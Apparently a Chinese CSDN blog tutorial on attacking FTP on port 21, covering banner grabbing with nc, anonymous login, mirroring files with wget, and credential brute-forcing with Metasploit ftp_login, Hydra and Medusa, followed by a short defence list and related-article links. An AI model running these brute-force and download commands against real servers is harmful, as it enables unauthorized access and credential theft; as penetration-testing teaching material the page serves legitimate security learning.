端口渗透——21端口FTP

最新推荐文章于 2024-05-18 00:37:32 发布
最新推荐文章于 2024-05-18 00:37:32 发布
阅读量7.2k 收藏 27
点赞数 3
分类专栏: 渗透测试 文章标签: windows python linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120314194
版权

21端口开启的服务FTP代表文件传输协议,其用于在计算机网络上的客户端和服务器之间传输文件。默认端口是21,当共享数据时会被打开。

枚举ftp服务的版本信息

nc -vn <ip> 21

获取FTP证书(如果存在)

openssl s_client -connect <ip>:21 -starttls ftp

匿名登录
文件可以被隐藏,所以匿名登录可能看不到文件

ftp <ip>
>anonymous
>anonymous
>ls -a

在这里插入图片描述

浏览器连接

ftp://anonymous:anonymous@192.168.0.117

从FTP下载文件

##下载所有文件
wget -m ftp://anonymous:anonymous@192.168.0.117
wget -m --no-passive ftp://anonymous:anonymous@192.168.0.117

Windows上的FTP

Metasploit扫描ftp版本

use auxiliary/scanner/ftp/ftp_version 
msf auxiliary(ftp_version) > set rhosts 192.168.1.128 
msf auxiliary(ftp_version) > exploit

在这里插入图片描述

Metasploit暴力破解FTP登录凭证

用户字典和密码字典需要自己制作
一个很好的字典集合:

https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt

use auxiliary/scanner/ftp/ftp_login 
msf auxiliary(ftp_login) > set rhosts 192.168.1.128 
msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt 
msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt 
msf auxiliary(ftp_login) > set stop_on_success true 
msf auxiliary(ftp_login) > exploit

![在这里插入图片描述](https://img-blog.csdnimg.cn/a57f987ddd024d0281e7f108f37f664d.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBAVGhnaWxpbA==,size_20,color_FFFFFF,t_70,g_se,x_16)



## Linux上的FTP服务

**嗅探FTP凭证**
使用嗅探抓取FTP凭证
使用Wireshark捕获流量,发现明文传输的登录凭证。
可以通过使用ssl证书对流量进行加密,防止攻击者抓取流量后读取登录凭证

**Hydra暴力破解**
自定以账号、密码字典
```bash
hydra -L user.txt -P pass.txt 192.168.0.117 ftp

medusa暴力破解
自定义账号、密码字典

medusa -h 192.168.0.117 -U /root/user.txt -P /root/pass.txt -M ftp

linux下的FTP爆破也可采用Msfconsole的auxiliary/scanner/ftp/ftp_login模块

防御:

1.更改端口
2.设置ip白名单
3.FTP日志监控

Thgilil
关注
  • 3
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploitable2 渗透测试(ftp 端口21
半夜好饿的博客
09-17 3577
端口扫描: 输入search scanner/ftp找到辅助的扫描工具。 1、利用auxiliary/scanner/ftp/ftp_version模块。 使用auxiliary/scanner/ftp/ftp_version模块,并设置好目标地址,端口采用默认的21,exploit -j开始,查看ftp的版本,版本是vsFTPd 2.3.4 继续search vsFTPd看看有没有可以利用...
教程-ftp21端口,OpenSSH,22,内部敏感服务对外开放存在风险
weixin_43892871的博客
05-09 5159
原文链接: 很久没有用百度云观测,昨天突然心血来潮在百度站长管理里面看了一下,发现有站点的安全指数为54分,着实感觉有点低了。于是就打开百度云观测看了一下详细信息。 漏洞描述:21端口,内部敏感服务对外开放存在风险,容易引起安全问题。 漏洞描述:OpenSSH,22端口,内部敏感服务对外开放存在风险,容易引起安全问题! 安全问题基本服务商都有优化过,所以不用操心,但是如果使用服务器,是直接搭建面板也好还是纯DIY环境也好,这个都是需要自己动手去解决一些安全问题的,修改一些系统默认的参数,虽然系统或者面板
常见端口
3条鱼 的命名空间
07-13 1094
在上网的时候,我们经常会看到“端口”这个词,也会经常用到端口号,比如在FTP地址后面增加的“21”,21就表示端口号。那么端口到底是什么意思呢?怎样查看端口号呢?一个端口是否成为网络恶意攻击的大门呢?,我们应该如何面对形形色色的端口呢?下面就将介绍这方面的内容,以供大家参考。  21端口21端口主要用于FTP(File Transfer Protocol,文件传输协议)服务。  端口
Python 渗透测试:FTP 文件传输 爆破.(21端口
最新发布
网络安全领域___专研者.
05-18 485
文件传输是指在计算机网络中将数据从一个位置传输到另一个位置的过程。文件传输爆破是一种黑客攻击手段,主要针对文件传输系统的漏洞进行暴力破解.
常见端口漏洞
qq_38135115的博客
04-19 6876
常见服务端口 21端口 FTP(file Transfer Protocol)文件传输协议 1.匿名访问——未授权访问 2.弱密码 3.配置不当 直接 cd / && dir 4.FTP使用明文传输技术-嗅探 5.木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口21端口是默认的FTP端口,利用方式:弱口令探测/溢出 目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个
linux ftp 端口21,linux vsftpd修改默认端口21
weixin_32220917的博客
04-30 524
linux vsftpd修改默认端口21linux中一般情况下FTP端口21,默认的端口容易遭到别人的扫描、带来了一定程度的不安全。所以,最好的就是把21端口修改掉。下面我们修改vsftpd端口为90901. 修改linux servicesvi /etc/services//找到下面的行改成9090端口ftp 9090/tcpftp 9090/...
服务器w7系统怎么开启端口,win7如何打开21端口|win7开启21端口的方法
weixin_29325955的博客
08-10 2411
21端口主要用于FTP(文件传输协议)服务,很多系统的用户在使用FlashFXP上传文件至服务器,在登录的时候提示21端口没有打开,那么开放21端口的方法:1、点击“开始”按钮打开“开始”菜单,选择“控制面板”;2、如果“查看方式”为“类别”,点击“系统和安全”;3、然后打开“Windows防火墙”;4、点击左侧的“高级设置”;5、右键点击“入站规则”打开菜单,选择“新建规则”(注,入站规则:别...
看完这篇 教你玩转渗透测试靶机——Metasploitable2
m0_67401746的博客
03-18 7545
Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载: Metasploitable2靶机安装: Metasploitable2靶机漏洞详解: Metasploitable2靶机渗透总结: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msf
渗透——内网转发之利用ftp实现文件传输
01-09
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于...
国外最经典的端口扫描器Superscan4.rar
11-04
例如,常见的HTTP服务通常在80端口运行,FTP21端口,SSH在22端口等。 Superscan 4提供了多种扫描类型,包括TCP全连接扫描、TCP半开扫描、SYN扫描和ACK扫描等。每种扫描方式都有其独特的作用和适用场景。例如,TCP...
BluesPortScan——端口扫描
10-06
【BluesPortScan——端口扫描工具详解】 端口扫描是网络安全领域中一项基础且重要的技术,主要用于探测目标主机开放的服务和端口,以便评估网络的安全性或进行故障排查。BluesPortScan是一款轻量级的端口扫描工具,...
FTP端口扫描入侵工具
09-05
很好用的一款国外扫描网站后台的软件,扫FTP弱口令工具通过绿色认证
华海VIP教程--网络端口入侵教程3
06-25
每个端口都有一个编号,范围从0到65535,其中0-1023是知名端口,通常由系统保留用于标准服务,如HTTP(80)、FTP21)和SSH(22)等。而1024以上的端口则可由用户自定义分配,这往往也是攻击者寻找的入口点。 ...
一款不错的扫描端口软件SUPERSCAN
04-08
这个标签直接点明了SUPERSCAN的核心功能——端口扫描。端口扫描是网络渗透测试和系统管理员日常工作中常用的一种技术,通过发送特定的数据包到目标主机并分析返回的信息,来探测目标主机上哪些端口是开放的,从而...
21和22端口
热门推荐
u011357712的专栏
04-24 3万+
在FileZilla 中: - 用sftp协议连接Server ,需要用port 22 - 用ftp协议连接Server, 用port21 一个控制端口一个数据传输端口端口20才是真正传输所用到的端口端口21只用于FTP的登陆认证。
关于HTTP使用21端口的问题
WEB, WEb, Web, web
12-06 5929
21端口通常用于FTP服务,但由于某种原因,我需要在IIS中配置网站的端口21,网站启动正常,但是使用IE、Chrome、Safari均无法访问,开始时我一直认为是IIS的问题,后来将Web服务器换成Apache,现象依旧,仍然无法访问。后来使用Firefox访问,提示“此地址使用了一个通常用于网络浏览以外的端口。出于安全原因,Firefox 取消了该请”,从网上搜索解决方法,进行如下配置后Fi
针对端口渗透测试总结大全
m0_48368237的博客
01-26 644
端口渗透过程中我们需要关注几个问题: 1、 端口的banner信息 2、 端口上运行的服务 3、 常见应用的默认端口 当然对于上面这些信息的获取,我们有各式各样的方法,最为常见的应该就是nmap了吧!我们也可以结合其他的端口扫描工具,比如专门的3389、1433等等的端口扫描工具; 服务默认端口 公认端口(Well Known Ports):0-1023,他们紧密绑定了一些服务; 注册端口(Registered Ports):1024-49151,他们松散的绑定了一些服务; 动态/私有:49152-6
linux开启 ftp21端口
05-30
Linux 系统上开启 FTP 21 端口,您可以按照以下步骤进行操作: 1. 确认 FTP 服务器已安装并正在运行。 2. 确认防火墙已允许 FTP 服务通过 21 端口。您可以使用以下命令来打开 21 端口: ``` sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT ``` 如果您使用的是防火墙软件,也可以在软件设置中添加 FTP 服务的例外。 3. 确认 SELinux 已允许 FTP 服务通过 21 端口。您可以使用以下命令来设置 SELinux: ``` sudo setsebool -P ftpd_use_passive_mode 1 ``` 4. 重启 FTP 服务以使更改生效。 以上是在 CentOS 系统上的操作方法,其他 Linux 发行版可能会有所不同。如果您还遇到问题,请查看您所使用的 Linux 系统的文档或者咨询专业人士的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值